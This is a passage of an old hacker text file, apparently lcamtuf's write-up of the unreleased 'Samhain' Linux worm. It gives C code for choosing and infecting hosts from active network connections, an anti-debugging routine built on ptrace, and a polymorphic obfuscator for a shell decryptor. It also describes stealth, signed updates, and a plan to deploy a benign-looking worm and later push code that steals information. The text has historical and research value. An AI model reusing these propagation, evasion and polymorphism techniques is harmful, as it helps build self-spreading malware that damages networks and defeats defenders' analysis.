writeworm.txt

worm的简单编写方法

Oh, spreading. Victims are choosen by monitoring active network connections.
With random probability, servers are picked from this list and attacked.
In case of success, server is added to 'visited' list - these are not
attacked anymore. In case of failure, server is not attacked until new
version of worm is uploaded. Of course, internal servers list is finite
and sometimes server might be attacked again (if it's not our child and
it isn't currently connected), but who cares, attempt will be ignored or
upgrade procedure will happen, depending on timestamps.

This code is used to qualify host (obtained from network stats):

void infect_host(int addr) {
  struct hostent* h;
  int (*exp)(char*);
  int i=0,n=0,max=VERY_SMALL;
  if ((0x7F & addr)==0x7F) return;      // do not touch 127.* subnet :-)
  h=gethostbyaddr((void*)&addr,4,AF_INET);
  if (is_host_happy(h->h_name)) return; // In wormnet?
  for (i=0;remote[i].present;i++) remote[i].used=0;
  while ((max=VERY_SMALL)) {
    n=-1;
    for (i=0;remote[i].present;i++)
      if (!remote[i].used && remote[i].hits>=max) { max=remote[i].hits;n=i; }
    if (n<0) break;
    exp=remote[n].handler;
    remote[n].used=1;
    current_module=n;
    remote[n].hits+=(i=exp(h->h_name));
    if (i>0) break;
  }
}



0x05: Integrity
-----------------------------------------------------------------------------

The most important thing in worm's life is not to get caught. We have to be
sure it's not easy to trace/debug us - we want to make reverse-engineering
even harder. We don't want to expose our internal wormnet protocols,
communication with kernel module and detection techniques used by worms to
check for themselves, etc. Four things:

- hide everything: see section 0x02.
- hash, crypt, scramble: see sections 0x01, 0x04.
- don't let them caught you: see section 0x02.
- avoid debugging even if we cannot hide!

We used several anti-debugger techniques, including application-dependent
(bugs in strace on displaying some invalid parameters to syscalls, bugs in
gdb while parsing elf headers, ommiting frame pointer, self-modyfing code
and so on), as well as some universal debugger-killer routines called
quite often (they aren't really time-expensive). This is one of them:

void kill_debug(void) {
  int x,n;
  n=getppid();
  if (!(x=fork())) {
    x=getppid();
    if (ptrace(PTRACE_ATTACH,x,0,0)) {
      fprintf(stderr,
          "\n\n\n*****************************************\n"
                "*** I REALLY DO NOT LIKE TO BE TRACED ***\n"
                "*****************************************\n\n\n");
      ptrace(PTRACE_ATTACH,n,0,0);
      kill(x,9);
    }
    usleep(1000);
    ptrace(PTRACE_DETACH,x,0,0);
    exit(0);
  }
  waitpid(x,&n,0);
  return;
}

As I told before, worm modules were signed. First, using simple signatures,
then using simple private key signing (not really difficult to crack, as
key was relatively short, but for sure too difficult for amateurs). This
made us sure we're going to replace our worm image with REAL worm, not
dummy anti-worm flare.

0x06: Polymorphism
-----------------------------------------------------------------------------

Polymorphic engine was quite simple - designed to make sure our decryptor
will be different every time. As it has been written in shell language, it
was pretty easy to add bogus commands, insert empty shell variables, add
\ and break contents, or even replace some parts with $SHELL_VARIABLES
declared before. Getting original content is not quite easy, but of course,
all you have to do is to imitate shell parsing of this decryptor to get
original contents, then you'll be able to identify at least some common
code.

Code adding \ to decryptor looks like:

  while (decryptor[x]) {
    switch (decryptor[x]) {
      case ' ':
        if (!rnd(2)) buf[y++]=' '; else goto difolt;
        break;
      case '\n':
        if (!you_can) you_can=1;
      default:
      difolt:
        if ((you_can && you_can++>1) && !rnd(10) && decryptor[x]>5 &&
             decryptor[x]!='>' && decryptor[x]!='<' && norm>2) {
          buf[y++]='\\';buf[y++]=10;norm=0;
        } else {buf[y++]=decryptor[x++];norm++;}
    }
  }
 

0x07: Usability
-----------------------------------------------------------------------------

It's stupid to launch worm designed eg. to steal secret information from
specific host, because we have no idea if it will work fine, and won't be
caught. If so, it might be debugged (it's made to be hard to debug, but,
as every program, it's not impossible to do it, especially if you're able
to separate worm code). Instead, we should be able to release 'harmless'
worm, then, when we're sure it accessed interesting host and haven't been
caught, we might send an update, which will try to reach destination worm,
replace it with our evil code, then shut down every worm it can access via
wormnet (by sending signed update, that will send itself to other worms,
then shut down).

Maybe it isn't the perfect solution, but in fact it's probably much safer
than inserting even generic backdoor code by default.


0x08: What happened then?
-----------------------------------------------------------------------------

That's it, the Samhain project, fit into approx. 40 kB of code. What
happened to it? Nothing. It hasn't been ever released, and I never removed
restrictions from lookup_victim() and infect_host() routines. It's still
lying on my hard drive, getting covered with dust and oblivion, and that's
extacly what we wanted.

I stopped developing new code and testing it in January, 1999, with Samhain
2.2 and approx. 10000 lines of code. Wojtek Bojdol has been developing his
much more advanced wormnet and system infection/monitoring code till February
or March, but I haven't found enough time to incorporate his sources within
mainstream source tree. Then, we removed our repository from networked server
we used to exchange ideas. I gradually published some bugs used in exploit
database to BUGTRAQ, some of them (especially those not discovered by me)
we kept for ourselves.

The story ends. Till another rainy day, till another three bored hackers.
You may be sure it will happen. The only thing you can't be sure is the
end of next story.


0x09: References
-----------------------------------------------------------------------------

[1] ILOVEYOU worm:
    Dramatical headlines:
    + http://www.cnn.com/2000/TECH/computing/05/04/iloveyou.03/   
    Technical analysis:
    + http://www.securityfocus.com/templates/article.html?id=30
    Source of "ILOVEYOU" worm:
    + http://packetstorm.securify.com/viral-db/love-letter-source.txt

[2] International Obfuscated C Code Contest archives:
    + http://www.ioccc.org

[3] Libworm - unprivledged process hiding techniques:
    + http://lcamtuf.na.export.pl/pliki/libworm.tgz

[4] "yet another article about stealth modules in linux"
    + http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-08-22&msg=19990828144031.A20936@richi.bombi.net

[5] Advanced File Hide and Redirect Module (in fact, old and lame ;)
    + http://lcamtuf.na.export.pl/pliki/afharm.zip
    Adore
    + ???

0x0f: Outro
-----------------------------------------------------------------------------

First of all, all the best goes to Maja :)

Then, I'd especially like to thank people involved in the Samhain project, as
well as other people who helped me these times to understand life, universe
and everything:

Wojciech Bojdol ...................................................... wojboj
Sebastian Krahmer ................................................... stealth
Krzysztof G. Baranowski ................................................. kgb
Rafal Wojtczuk ....................................................... nergal
Slawomir Krawczyk .................................................... nises2
Mariusz Woloszyn ...................................................... kil3r
Mariusz Marcinkiewicz .................................................. manY

Also, I'd like to thank all the teso, HERT, lam3rz, A18 and b0f people. Thank
you, agnes, for good will and patience. Last, but not least, best wishes to
Solar Designer (thanks for interesting ideas and constructive critics).

Any mistakes in this text are solely my fault. I'm really sorry for my
not-good-as-I-wish english, you have to deal with it, or correct me :)
I'd appreciate it.

This text has been written in 6 hours at late Sunday night.

Please send flames, ideas and 'h0w t0 kr4ck p4ssw0rdz' to <lcamtuf@tpi.pl>
or <lcamtuf@dione.ids.pl>. This document is available at:

http://lcamtuf.na.export.pl/worm.txt

--

October, 31 - Samhain (pronounced sow-inn) - this is time of endings and
time of beginnings - so at Samhain, we celebrate the New Year. This is a
quieter time, a time when the veil between worlds is thin and the spirits
may pass more easily. At Mabon, the God Lugh died in order for us to live
through His abundance. During the intervening time, He has gathered the
spirits of those that have died over the year and waits for this night so
that they may pass through the gate to the other side. This is the time to
revere our ancestors and to say farewell to those that have passed this last
year. It is also a time of divination. The abundance of the fields now gives
way to the power and strength of the Horned God of the Hunt. This begins a
time of darkness. From now until Yule, the days grow darker and colder.
Winter storms begin to sweep down from the north.